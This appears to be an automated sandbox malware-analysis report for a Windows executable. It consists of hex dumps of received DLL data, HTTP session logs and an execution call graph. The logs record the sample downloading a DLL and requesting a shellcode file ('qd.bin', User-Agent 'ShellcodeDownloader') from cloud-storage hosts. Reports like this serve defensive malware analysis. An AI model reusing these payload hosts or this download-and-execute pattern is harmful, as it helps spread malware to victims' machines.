7f ff ff 3b 11 0f 8c cf fe ff ff 8b bd e0 7f ff ff 8b 85 cc 7f ff ff 8d 95
                                                                    Data Ascii: ;{Kt$I;;;w+fn^4@;wB;
                                                                    2024-07-25 09:25:52 UTC8184INData Raw: 75 0e 56 e8 4d fd ff ff 83 c4 04 33 c0 5e 5d c3 8b c6 5e 5d c3 55 8b ec 8b 15 e0 bd 17 10 33 c9 b8 20 d6 17 10 56 85 d2 7e 0f 8b 75 10 39 30 74 0e 41 83 c0 1c 3b ca 7c f4 83 c8 ff 5e 5d c3 8b 40 14 85 c0 74 f3 ff 75 14 ff 75 0c ff 75 08 ff d0 83 c4 0c 5e 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 10 56 8b 75 0c 85 f6 0f 88 a9 01 00 00 8b 45 08 3b 70 10 0f 8d 9d 01 00 00 8b 40 18 53 57 8b 34 b0 8b 45 10 8b 56 10 3b c2 0f 8d 7d 01 00 00 8b 4e 14 8b 7d 14 3b f9 0f 8d 6f 01 00 00 8b 5d 18 03 c3 3b c2 0f 8f 62 01 00 00 8b 55 1c 8d 04 17 3b c1 0f 8f 54 01 00 00 8b 7d 20 39 57 14 75 05 39 5f 18 74 13 53 8b cf e8 fe f8 ff ff 83 c4 04 85 c0 0f 85 34 01 00 00 83 7f 14 01 8b 47 1c 8b 08 89 4d f0 7e 0d 8b 50 04 2b d1 c1 fa 02 89 55 f4 eb 07 c7 45
                                                                    Data Ascii: uVM3^]^]U3 V~u90tA;|^]@tuuu^]UVuE;p@SW4EV;}N};o];bU;T} 9Wu9_tS4GM~P+UE
                                                                    2024-07-25 09:25:52 UTC8184INData Raw: 02 00 00 8b 44 24 10 ff 70 08 ff 15 ec d1 13 10 83 c4 04 89 43 1c e9 37 02 00 00 8b 44 24 10 ff 70 08 ff 15 ec d1 13 10 83 c4 04 89 43 20 e9 1f 02 00 00 8b 44 24 10 ff 70 08 ff 15 ec d1 13 10 83 c4 04 33 c9 83 f8 01 7e 0b 8d 49 00 d1 f8 41 83 f8 01 7f f8 0f b7 c1 89 44 24 1c e9 f1 01 00 00 8b 44 24 10 ff 70 08 ff 15 ec d1 13 10 83 c4 04 33 c9 83 f8 01 7e 0d eb 03 8d 49 00 d1 f8 41 83 f8 01 7f f8 0f b7 c1 89 44 24 20 e9 c1 01 00 00 8b 44 24 10 ff 70 08 ff 15 ec d1 13 10 83 c4 04 33 c9 83 f8 01 7e 0d eb 03 8d 49 00 d1 f8 41 83 f8 01 7f f8 66 89 4b 4a e9 94 01 00 00 8b 44 24 10 ff 70 08 ff 15 ec d1 13 10 83 c4 04 33 c9 83 f8 01 7e 08 d1 f8 41 83 f8 01 7f f8 66 89 4b 4c e9 6c 01 00 00 8b 44 24 10 b9 90 91 17 10 8b 70 08 8b d6 e8 84 3b 01 00 85 c0 b9 d8 92 17
                                                                    Data Ascii: D$pC7D$pC D$p3~IAD$D$p3~IAD$ D$p3~IAfKJD$p3~AfKLlD$p;
                                                                    2024-07-25 09:25:52 UTC8184INData Raw: 01 00 83 c4 04 83 c8 ff 5f 5e 8b e5 5d c3 cc cc cc cc cc cc cc 55 8b ec 83 ec 10 89 55 f0 53 8b d9 81 fa 00 20 00 00 74 72 33 c9 89 4d fc 39 4b 14 7e 68 8b 43 18 56 57 33 f6 85 c0 7e 52 8b c2 99 89 45 f4 89 55 f8 8b 43 1c ff 75 f8 ff 75 f4 8b 04 88 8d 3c b0 8b 07 85 c0 79 15 f7 d8 99 0f a4 c2 0d c1 e0 0d 52 50 e8 88 2a 13 00 f7 d8 eb 0f 99 0f a4 c2 0d c1 e0 0d 52 50 e8 75 2a 13 00 8b 4d fc 46 89 07 8b 43 18 3b f0 7c ba 8b 55 f0 41 89 4d fc 3b 4b 14 7c 9f 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc 53 8b d9 0f 57 d2 56 57 66 0f 28 da 8b 03 8b 53 04 8d 04 c0 8d 3c c2 3b d7 0f 84 82 00 00 00 f2 0f 10 25 e0 f0 16 10 8b 43 04 33 f6 3b c7 74 6d f2 0f 10 48 38 8b 48 04 85 f6 74 08 f2 0f 5c 4e 38 2b 4e 04 66 0f 2f d1 72 0e f2 0f 11 60 28 3b c2 72 3c 8d 50 48 eb 37 3b c2
                                                                    Data Ascii: _^]UUS tr3M9K~hCVW3~REUCuu<yRP*RPu*MFC;|UAM;K|_^[]SWVWf(S<;%C3;tmH8Ht\N8+Nf/r`(;r<PH7;
                                                                    2024-07-25 09:25:52 UTC8184INData Raw: 00 c7 45 f8 00 00 00 00 89 7d f4 0f 8e c1 00 00 00 8b 47 04 85 c0 0f 84 9a 00 00 00 ff 70 10 ff 70 0c ff 70 08 ff 70 04 68 3c f9 13 10 e8 1b fa 00 00 8b 37 83 c4 14 83 7b 20 00 c7 45 fc 00 00 00 00 76 72 8b 56 0c 8b c2 8b 5e 04 2b c3 8b 4e 08 8b 3e 50 8b c1 2b c7 50 52 51 53 57 68 58 f9 13 10 e8 e6 f9 00 00 8b 7e 1c 83 c4 1c 85 ff 74 30 33 db 39 5e 18 76 29 83 c7 1c 8b ff 8b 07 ff 70 10 ff 70 0c ff 70 08 ff 70 04 68 80 f9 13 10 e8 b8 f9 00 00 43 8d 7f 3c 83 c4 14 3b 5e 18 72 dc 8b 45 fc 83 c6 34 8b 5d ec 40 89 45 fc 3b 43 20 72 91 8b 7d f4 8b 45 f8 83 c7 24 40 89 7d f4 89 45 f8 0f b7 c0 3b 43 30 0f 8c 42 ff ff ff 8b 75 f0 8b 7d e4 46 83 c3 3c 0f b7 c6 89 75 f0 89 5d ec 3b 07 0f 8c f8 fe ff ff 8b 45 e8 81 c7 04 02 00 00 8b 4d e0 40 89 45 e8 0f b7 c0 89 7d
                                                                    Data Ascii: E}Gpppph<7{ EvrV^+N>P+PRQSWhX~t039^v)pppphC<;^rE4]@E;C r}E$@}E;C0Bu}F<u];EM@E}
                                                                    2024-07-25 09:25:52 UTC8184INData Raw: 08 56 0f b7 32 3b 71 38 7e 13 68 d0 fa 13 10 e8 41 da 00 00 83 c4 04 83 c8 ff 5e 5d c3 8b 41 54 83 f8 04 74 1f 83 f8 10 75 34 8b 49 34 85 c9 74 e6 83 79 28 00 7f e0 8b 49 20 e8 56 07 00 00 33 c0 5e 5d c3 8d 42 04 69 d6 1c 01 00 00 6a 04 50 8b 41 40 03 50 14 e8 5a 07 00 00 83 c4 08 33 c0 5e 5d c3 cc cc 55 8b ec 8b 45 08 56 8b 75 0c 0f b7 56 08 3b 50 38 7e 13 68 00 fb 13 10 e8 d3 d9 00 00 83 c4 04 83 c8 ff 5e 5d c3 8b 48 54 83 f9 04 74 17 83 f9 10 75 28 8b 40 34 85 c0 74 e6 83 78 28 00 7f e0 8b 40 20 eb 03 8b 40 40 8b 48 14 8a 46 0b 69 d2 1c 01 00 00 88 84 11 d5 00 00 00 33 c0 5e 5d c3 55 8b ec 8b 4d 08 8b 55 0c 83 c2 08 8b 41 54 83 f8 04 74 23 83 f8 10 75 26 8b 49 34 85 c9 75 05 83 c8 ff 5d c3 83 79 28 00 7f f5 8b 49 20 e8 5d 07 00 00 33 c0 5d c3 8b 49 40
                                                                    Data Ascii: V2;q8~hA^]ATtu4I4ty(I V3^]BijPA@PZ3^]UEVuV;P8~h^]HTtu(@4tx(@ @@HFi3^]UMUATt#u&I4u]y(I ]3]I@
                                                                    2024-07-25 09:25:52 UTC8184INData Raw: ba 12 00 8b e5 5d c3 81 f9 01 04 00 00 74 0d 68 5c fc 13 10 e8 44 ba 00 00 83 c4 04 8b 53 10 bf 03 00 00 00 33 f6 89 7c 24 40 85 d2 7e 13 8b 4b 18 8b 01 83 78 28 00 74 0b 46 83 c1 04 3b f2 7c f0 83 ce ff 89 74 24 44 85 f6 78 28 ba 01 00 00 00 8b cb e8 d5 6b ff ff 89 44 24 48 85 c0 78 14 ba 02 00 00 00 8b cb e8 c1 6b ff ff 89 44 24 4c 85 c0 79 54 68 a8 fc 13 10 e9 6c ff ff ff 81 f9 01 03 00 00 74 0d 68 5c fc 13 10 e8 cd b9 00 00 83 c4 04 8b 53 10 bf 01 00 00 00 33 f6 89 7c 24 40 85 d2 7e 18 8b 4b 18 eb 03 8d 49 00 8b 01 83 78 28 00 74 0b 46 83 c1 04 3b f2 7c f0 83 ce ff 89 74 24 44 85 f6 eb aa 8b 53 18 8b 04 b2 8b 48 10 8b 70 18 89 4c 24 14 8b 48 14 89 4c 24 10 33 c9 89 74 24 18 85 ff 7e 3f 8d 64 24 00 8b 44 8c 44 8b 74 24 14 8b 04 82 39 70 10 8b 74 24 18
                                                                    Data Ascii: ]th\DS3|$@~Kx(tF;|t$Dx(kD$HxkD$LyThlth\S3|$@~KIx(tF;|t$DSHpL$HL$3t$~?d$DDt$9pt$
                                                                    2024-07-25 09:25:52 UTC8184INData Raw: ff 83 f9 30 74 09 83 f9 31 0f 85 9c fe ff ff 85 ff 74 05 8d 41 d0 89 07 5f 33 c0 5e c3 83 4e 08 04 5f 83 c8 ff 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 53 8b 1d f8 d1 13 10 56 57 89 55 fc 8b f1 f6 46 08 07 0f 85 ac 01 00 00 8b 46 40 85 c0 78 09 39 46 3c 0f 8d 98 01 00 00 ff 4e 1c 79 64 f6 06 01 75 05 83 cf ff eb 67 ff 76 14 8b 46 10 8b 4e 34 83 4e 04 10 50 ff 76 38 89 46 18 8b 01 ff d0 83 c4 0c 89 46 1c 85 c0 7f 22 79 10 83 4e 08 02 83 cf ff c7 46 1c 00 00 00 00 eb 33 83 4e 08 01 83 cf ff c7 46 1c 00 00 00 00 eb 23 48 89 46 1c 79 10 ba 01 00 00 00 8b ce e8 9f 11 ff ff 8b f8 eb 0d 8b 46 18 ff 46 3c 0f b6 38 40 89 46 18 83 ff ff 0f 84 1d 01 00 00 83 ff 23 0f 85 ac 00 00 00 f6 46 08 07 0f 85 0a 01 00 00 8b 46 40 85 c0 78 09 39 46 3c 0f 8d
                                                                    Data Ascii: 0t1tA_3^N_^UQSVWUFF@x9F<NydugvFN4NPv8FF"yNF3NF#HFyFF<8@F#FF@x9F<
                                                                    2024-07-25 09:25:52 UTC8184INData Raw: 8b 43 2c 0f bf 7c c8 02 8d 04 c8 0f bf 08 0f bf 58 04 e9 d4 01 00 00 8b f9 8b d9 e9 cb 01 00 00 f6 46 08 07 0f 85 41 03 00 00 8b 46 40 85 c0 78 09 39 46 3c 0f 8d 2d 03 00 00 ff 4e 1c 79 64 f6 06 01 75 05 83 cb ff eb 67 ff 76 14 8b 46 10 8b 4e 34 83 4e 04 10 50 ff 76 38 89 46 18 8b 01 ff d0 83 c4 0c 89 46 1c 85 c0 7f 22 79 10 83 4e 08 02 83 cb ff c7 46 1c 00 00 00 00 eb 33 83 4e 08 01 83 cb ff c7 46 1c 00 00 00 00 eb 23 48 89 46 1c 79 10 ba 01 00 00 00 8b ce e8 ce f1 fe ff 8b d8 eb 0d 8b 46 18 ff 46 3c 0f b6 18 40 89 46 18 83 fb ff 0f 84 b2 02 00 00 f6 46 08 07 0f 85 a8 02 00 00 8b 46 40 85 c0 78 09 39 46 3c 0f 8d 94 02 00 00 ff 4e 1c 79 64 f6 06 01 75 05 83 cf ff eb 67 ff 76 14 8b 46 10 8b 4e 34 83 4e 04 10 50 ff 76 38 89 46 18 8b 01 ff d0 83 c4 0c 89 46
                                                                    Data Ascii: C,|XFAF@x9F<-NydugvFN4NPv8FF"yNF3NF#HFyFF<@FFF@x9F<NydugvFN4NPv8FF


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    6192.168.2.64972243.153.232.1514434800C:\Users\user\Desktop\LisectAVT_2403002B_78.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-07-25 09:25:55 UTC133OUTGET /libcurl.dll HTTP/1.1
                                                                    User-Agent: Mozilla/5.0
                                                                    Host: www80-1323570959.cos.ap-singapore.myqcloud.com
                                                                    Cache-Control: no-cache
                                                                    2024-07-25 09:25:56 UTC472INHTTP/1.1 200 OK
                                                                    Content-Type: application/x-msdownload
                                                                    Content-Length: 38896
                                                                    Connection: close
                                                                    Accept-Ranges: bytes
                                                                    Content-Disposition: attachment
                                                                    Date: Thu, 25 Jul 2024 09:25:55 GMT
                                                                    ETag: "da33ad352674b718a8b1ebbb6d77a38b"
                                                                    Last-Modified: Wed, 20 Mar 2024 00:12:00 GMT
                                                                    Server: tencent-cos
                                                                    x-cos-force-download: true
                                                                    x-cos-hash-crc64ecma: 11243683211203548510
                                                                    x-cos-request-id: NjZhMjFhMjNfZTgwZTc5MWVfOTFhZV81ZjVhOTE=
                                                                    x-cos-server-side-encryption: AES256
                                                                    2024-07-25 09:25:56 UTC15912INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cf 77 5a b1 8b 16 34 e2 8b 16 34 e2 8b 16 34 e2 82 6e a7 e2 89 16 34 e2 49 97 35 e3 89 16 34 e2 49 97 31 e3 80 16 34 e2 49 97 30 e3 81 16 34 e2 49 97 37 e3 8a 16 34 e2 c0 6e 35 e3 88 16 34 e2 8b 16 35 e2 af 16 34 e2 64 94 3d e3 89 16 34 e2 64 94 34 e3 8a 16 34 e2 64 94 cb e2 8a 16 34 e2 8b 16 a3 e2 8a 16 34 e2 64 94 36 e3 8a 16 34 e2 52 69 63 68 8b 16 34 e2 00 00 00 00 00 00 00
                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$wZ444n4I54I14I04I74n5454d=4d44d44d64Rich4
                                                                    2024-07-25 09:25:56 UTC8188INData Raw: 04 00 00 00 2e 72 74 63 24 49 41 41 00 00 00 00 84 26 00 00 04 00 00 00 2e 72 74 63 24 49 5a 5a 00 00 00 00 88 26 00 00 04 00 00 00 2e 72 74 63 24 54 41 41 00 00 00 00 8c 26 00 00 04 00 00 00 2e 72 74 63 24 54 5a 5a 00 00 00 00 90 26 00 00 90 00 00 00 2e 78 64 61 74 61 24 78 00 00 00 00 20 27 00 00 80 00 00 00 2e 65 64 61 74 61 00 00 a0 27 00 00 50 00 00 00 2e 69 64 61 74 61 24 32 00 00 00 00 f0 27 00 00 14 00 00 00 2e 69 64 61 74 61 24 33 00 00 00 00 04 28 00 00 74 00 00 00 2e 69 64 61 74 61 24 34 00 00 00 00 78 28 00 00 82 02 00 00 2e 69 64 61 74 61 24 36 00 00 00 00 00 30 00 00 18 00 00 00 2e 64 61 74 61 00 00 00 18 30 00 00 74 03 00 00 2e 62 73 73 00 00 00 00 00 40 00 00 a0 00 00 00 2e 72 73 72 63 24 30 31 00 00 00 00 a0 40 00 00 08 05 00 00 2e 72 73
                                                                    Data Ascii: .rtc$IAA&.rtc$IZZ&.rtc$TAA&.rtc$TZZ&.xdata$x '.edata'P.idata$2'.idata$3(t.idata$4x(.idata$60.data0t.bss@.rsrc$01@.rs
                                                                    2024-07-25 09:25:56 UTC14796INData Raw: 04 0a 13 0e 44 69 67 69 43 65 72 74 2c 20 49 6e 63 2e 31 41 30 3f 06 03 55 04 03 13 38 44 69 67 69 43 65 72 74 20 54 72 75 73 74 65 64 20 47 34 20 43 6f 64 65 20 53 69 67 6e 69 6e 67 20 52 53 41 34 30 39 36 20 53 48 41 33 38 34 20 32 30 32 31 20 43 41 31 02 10 08 57 97 42 a9 53 ba d9 0d 42 37 a3 f3 e3 8c 5e 30 0d 06 09 60 86 48 01 65 03 04 02 01 05 00 a0 7c 30 10 06 0a 2b 06 01 04 01 82 37 02 01 0c 31 02 30 00 30 19 06 09 2a 86 48 86 f7 0d 01 09 03 31 0c 06 0a 2b 06 01 04 01 82 37 02 01 04 30 1c 06 0a 2b 06 01 04 01 82 37 02 01 0b 31 0e 30 0c 06 0a 2b 06 01 04 01 82 37 02 01 15 30 2f 06 09 2a 86 48 86 f7 0d 01 09 04 31 22 04 20 c6 ae b7 06 5f e7 e4 c3 2b 66 c5 ee c0 33 67 15 97 84 ae e0 c8 8c 8f 0d 7b 30 44 4a 2b 04 36 bf 30 0d 06 09 2a 86 48 86 f7 0d 01
                                                                    Data Ascii: DigiCert, Inc.1A0?U8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1WBSB7^0`He|0+7100*H1+70+710+70/*H1" _+f3g{0DJ+60*H


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    7192.168.2.649723159.75.57.354434800C:\Users\user\Desktop\LisectAVT_2403002B_78.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-07-25 09:26:02 UTC137OUTGET /qd.bin HTTP/1.1
                                                                    User-Agent: ShellcodeDownloader
                                                                    Host: wwwbin-1323571107.cos.ap-guangzhou.myqcloud.com
                                                                    Cache-Control: no-cache
                                                                    2024-07-25 09:26:02 UTC235INHTTP/1.1 451 Unavailable For Legal Reasons
                                                                    Content-Type: application/xml
                                                                    Content-Length: 477
                                                                    Connection: close
                                                                    Date: Thu, 25 Jul 2024 09:26:02 GMT
                                                                    Server: tencent-cos
                                                                    x-cos-request-id: NjZhMjFhMmFfYzVkMmIyMDlfOTUyY18yNGI1OWMz
                                                                    2024-07-25 09:26:02 UTC477INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 75 74 66 2d 38 27 20 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 09 3c 43 6f 64 65 3e 55 6e 61 76 61 69 6c 61 62 6c 65 46 6f 72 4c 65 67 61 6c 52 65 61 73 6f 6e 73 3c 2f 43 6f 64 65 3e 0a 09 3c 4d 65 73 73 61 67 65 3e 44 75 65 20 74 6f 20 79 6f 75 72 20 61 63 63 6f 75 6e 74 20 69 73 20 61 72 72 65 61 72 73 2c 20 69 74 20 69 73 20 75 6e 61 76 61 69 6c 61 62 6c 65 20 75 6e 74 69 6c 20 79 6f 75 20 72 65 63 68 61 72 67 65 2e 3c 2f 4d 65 73 73 61 67 65 3e 0a 09 3c 52 65 73 6f 75 72 63 65 3e 2f 71 64 2e 62 69 6e 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 09 3c 52 65 71 75 65 73 74 49 64 3e 4e 6a 5a 68 4d 6a 46 68 4d 6d 46 66 59 7a 56 6b 4d 6d 49 79 4d 44 6c 66 4f 54 55 79 59 31 38 79 4e 47
                                                                    Data Ascii: <?xml version='1.0' encoding='utf-8' ?><Error><Code>UnavailableForLegalReasons</Code><Message>Due to your account is arrears, it is unavailable until you recharge.</Message><Resource>/qd.bin</Resource><RequestId>NjZhMjFhMmFfYzVkMmIyMDlfOTUyY18yNG


                                                                    Click to jump to process

                                                                    Click to jump to process

                                                                    Click to dive into process behavior distribution

                                                                    Click to jump to process

                                                                    Target ID:0
                                                                    Start time:05:25:29
                                                                    Start date:25/07/2024
                                                                    Path:C:\Users\user\Desktop\LisectAVT_2403002B_78.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\LisectAVT_2403002B_78.exe"
                                                                    Imagebase:0xaa0000
                                                                    File size:916'089 bytes
                                                                    MD5 hash:89D61660F3E47A8A0F7AE37D5F8F03ED
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:2
                                                                    Start time:05:25:29
                                                                    Start date:25/07/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff66e660000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:8
                                                                    Start time:05:26:02
                                                                    Start date:25/07/2024
                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 1156
                                                                    Imagebase:0x3d0000
                                                                    File size:483'680 bytes
                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:9.1%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:2.9%
                                                                      Total number of Nodes:2000
                                                                      Total number of Limit Nodes:60
                                                                      execution_graph 20882 aa40a0 20883 aa40c7 20882->20883 20884 aa411b 20883->20884 20885 aa4156 codecvt std::ios_base::good std::runtime_error::runtime_error 20883->20885 20887 aa40e1 char_traits 20883->20887 20902 aa2a90 20884->20902 20889 aa5060 40 API calls 20885->20889 20890 aa417d char_traits 20885->20890 20892 aa41f8 20885->20892 20898 aa420f std::ios_base::good std::runtime_error::runtime_error 20885->20898 20905 aae4b3 20885->20905 20938 aa6730 20885->20938 20889->20885 20891 aa51d0 task 39 API calls 20890->20891 20891->20887 20893 aa4290 20892->20893 20896 aa4202 char_traits 20892->20896 20895 aa51d0 task 39 API calls 20893->20895 20895->20887 20897 aa51d0 task 39 API calls 20896->20897 20897->20887 20899 aa4253 20898->20899 20925 ab0999 20898->20925 20901 aa51d0 task 39 API calls 20899->20901 20901->20887 20903 aae4b3 _Fgetc 41 API calls 20902->20903 20904 aa2a9d 20903->20904 20904->20887 20906 aae4bf CallCatchBlock 20905->20906 20907 aae4c9 20906->20907 20908 aae4e1 20906->20908 20909 ab1ea8 __dosmaperr 14 API calls 20907->20909 20941 aae736 EnterCriticalSection 20908->20941 20911 aae4ce 20909->20911 20913 ab12dd __wsopen_s 39 API calls 20911->20913 20912 aae4ec 20914 ab5d12 _Fgetc 39 API calls 20912->20914 20922 aae504 20912->20922 20924 aae4d9 _Fgetc 20913->20924 20914->20922 20915 aae56c 20918 ab1ea8 __dosmaperr 14 API calls 20915->20918 20916 aae594 20942 aae477 20916->20942 20920 aae571 20918->20920 20919 aae59a 20949 aae5c4 20919->20949 20923 ab12dd __wsopen_s 39 API calls 20920->20923 20922->20915 20922->20916 20923->20924 20924->20885 20926 ab09a5 CallCatchBlock 20925->20926 20927 ab09ac 20926->20927 20928 ab09c1 20926->20928 20930 ab1ea8 __dosmaperr 14 API calls 20927->20930 20953 aae736 EnterCriticalSection 20928->20953 20931 ab09b1 20930->20931 20933 ab12dd __wsopen_s 39 API calls 20931->20933 20932 ab09cb 20954 ab08a5 20932->20954 20935 ab09bc 20933->20935 20935->20898 20969 aa74b0 20938->20969 20940 aa6743 20940->20885 20941->20912 20943 aae498 __fread_nolock 20942->20943 20944 aae483 20942->20944 20943->20919 20945 ab1ea8 __dosmaperr 14 API calls 20944->20945 20946 aae488 20945->20946 20947 ab12dd __wsopen_s 39 API calls 20946->20947 20948 aae493 20947->20948 20948->20919 20952 aae74a LeaveCriticalSection 20949->20952 20951 aae5ca 20951->20924 20952->20951 20953->20932 20955 ab08bd 20954->20955 20957 ab092d 20954->20957 20956 ab5d12 _Fgetc 39 API calls 20955->20956 20960 ab08c3 20956->20960 20958 ab985b _Ungetc 14 API calls 20957->20958 20959 ab0925 20957->20959 20958->20959 20965 ab0a04 20959->20965 20960->20957 20961 ab0915 20960->20961 20962 ab1ea8 __dosmaperr 14 API calls 20961->20962 20963 ab091a 20962->20963 20964 ab12dd __wsopen_s 39 API calls 20963->20964 20964->20959 20968 aae74a LeaveCriticalSection 20965->20968 20967 ab0a0a 20967->20935 20968->20967 20970 aa74c2 20969->20970 20971 aa74c7 20969->20971 20973 aa7750 20970->20973 20971->20940 20976 aa917d 20973->20976 20981 aa90e1 20976->20981 20979 aab163 Concurrency::cancel_current_task RaiseException 20980 aa919c 20979->20980 20984 aa11b0 20981->20984 20985 aaaf01 ___std_exception_copy 39 API calls 20984->20985 20986 aa11e9 20985->20986 20986->20979 22523 aae6a4 22524 aae2c6 ___scrt_uninitialize_crt 68 API calls 22523->22524 22525 aae6ac 22524->22525 22533 ab813c 22525->22533 22527 aae6b1 22528 ab7775 14 API calls 22527->22528 22529 aae6c0 DeleteCriticalSection 22528->22529 22529->22527 22530 aae6db 22529->22530 22531 ab73d1 ___free_lconv_mon 14 API calls 22530->22531 22532 aae6e6 22531->22532 22534 ab8148 CallCatchBlock 22533->22534 22543 ab13aa EnterCriticalSection 22534->22543 22536 ab81bf 22544 ab81de 22536->22544 22537 ab8153 22537->22536 22539 ab8193 DeleteCriticalSection 22537->22539 22541 aae447 69 API calls 22537->22541 22542 ab73d1 ___free_lconv_mon 14 API calls 22539->22542 22541->22537 22542->22537 22543->22537 22547 ab13f2 LeaveCriticalSection 22544->22547 22546 ab81cb 22546->22527 22547->22546 20987 aa10a5 20990 aaa200 20987->20990 20993 aaa1d3 20990->20993 20994 aaa1e9 20993->20994 20995 aaa1e2 20993->20995 21002 ab53a4 20994->21002 20999 ab5327 20995->20999 20998 aa10aa 21000 ab53a4 42 API calls 20999->21000 21001 ab5339 21000->21001 21001->20998 21005 ab50f0 21002->21005 21006 ab50fc CallCatchBlock 21005->21006 21013 ab13aa EnterCriticalSection 21006->21013 21008 ab510a 21014 ab514b 21008->21014 21010 ab5117 21024 ab513f 21010->21024 21013->21008 21015 ab5166 21014->21015 21016 ab51d9 std::_Locinfo::_Locinfo_ctor 21014->21016 21015->21016 21017 ab51b9 21015->21017 21027 ac176b 21015->21027 21016->21010 21017->21016 21018 ac176b 42 API calls 21017->21018 21021 ab51cf 21018->21021 21020 ab51af 21022 ab73d1 ___free_lconv_mon 14 API calls 21020->21022 21023 ab73d1 ___free_lconv_mon 14 API calls 21021->21023 21022->21017 21023->21016 21055 ab13f2 LeaveCriticalSection 21024->21055 21026 ab5128 21026->20998 21028 ac1778 21027->21028 21029 ac1793 21027->21029 21028->21029 21030 ac1784 21028->21030 21031 ac17a2 21029->21031 21036 ac598a 21029->21036 21032 ab1ea8 __dosmaperr 14 API calls 21030->21032 21043 abc392 21031->21043 21034 ac1789 __fread_nolock 21032->21034 21034->21020 21037 ac59aa HeapSize 21036->21037 21038 ac5995 21036->21038 21037->21031 21039 ab1ea8 __dosmaperr 14 API calls 21038->21039 21040 ac599a 21039->21040 21041 ab12dd __wsopen_s 39 API calls 21040->21041 21042 ac59a5 21041->21042 21042->21031 21044 abc3aa 21043->21044 21045 abc39f 21043->21045 21047 abc3b2 21044->21047 21053 abc3bb __dosmaperr 21044->21053 21046 ab830e std::_Locinfo::_Locinfo_ctor 15 API calls 21045->21046 21051 abc3a7 21046->21051 21048 ab73d1 ___free_lconv_mon 14 API calls 21047->21048 21048->21051 21049 abc3c0 21052 ab1ea8 __dosmaperr 14 API calls 21049->21052 21050 abc3e5 HeapReAlloc 21050->21051 21050->21053 21051->21034 21052->21051 21053->21049 21053->21050 21054 ab2c09 std::_Facet_Register 2 API calls 21053->21054 21054->21053 21055->21026 20802 ab77b5 20803 ab77da 20802->20803 20804 ab77c2 20802->20804 20808 ab7839 20803->20808 20810 ab985b _Ungetc 14 API calls 20803->20810 20816 ab77d2 20803->20816 20805 ab1ea8 __dosmaperr 14 API calls 20804->20805 20806 ab77c7 20805->20806 20807 ab12dd __wsopen_s 39 API calls 20806->20807 20807->20816 20809 ab5d12 _Fgetc 39 API calls 20808->20809 20811 ab7852 20809->20811 20810->20808 20822 ab9d93 20811->20822 20814 ab5d12 _Fgetc 39 API calls 20815 ab788b 20814->20815 20815->20816 20817 ab5d12 _Fgetc 39 API calls 20815->20817 20818 ab7899 20817->20818 20818->20816 20819 ab5d12 _Fgetc 39 API calls 20818->20819 20820 ab78a7 20819->20820 20821 ab5d12 _Fgetc 39 API calls 20820->20821 20821->20816 20823 ab9d9f CallCatchBlock 20822->20823 20824 ab9da7 20823->20824 20829 ab9dc2 20823->20829 20825 ab1e95 __dosmaperr 14 API calls 20824->20825 20826 ab9dac 20825->20826 20827 ab1ea8 __dosmaperr 14 API calls 20826->20827 20851 ab785a 20827->20851 20828 ab9dd9 20831 ab1e95 __dosmaperr 14 API calls 20828->20831 20829->20828 20830 ab9e14 20829->20830 20833 ab9e1d 20830->20833 20834 ab9e32 20830->20834 20832 ab9dde 20831->20832 20835 ab1ea8 __dosmaperr 14 API calls 20832->20835 20836 ab1e95 __dosmaperr 14 API calls 20833->20836 20852 abf1fa EnterCriticalSection 20834->20852 20846 ab9de6 20835->20846 20838 ab9e22 20836->20838 20842 ab1ea8 __dosmaperr 14 API calls 20838->20842 20839 ab9e38 20840 ab9e6c 20839->20840 20841 ab9e57 20839->20841 20845 ab9eac __fread_nolock 51 API calls 20840->20845 20843 ab1ea8 __dosmaperr 14 API calls 20841->20843 20842->20846 20847 ab9e5c 20843->20847 20844 ab12dd __wsopen_s 39 API calls 20844->20851 20848 ab9e67 20845->20848 20846->20844 20849 ab1e95 __dosmaperr 14 API calls 20847->20849 20853 ab9ea4 20848->20853 20849->20848 20851->20814 20851->20816 20852->20839 20856 abf2af LeaveCriticalSection 20853->20856 20855 ab9eaa 20855->20851 20856->20855 22851 aa3b80 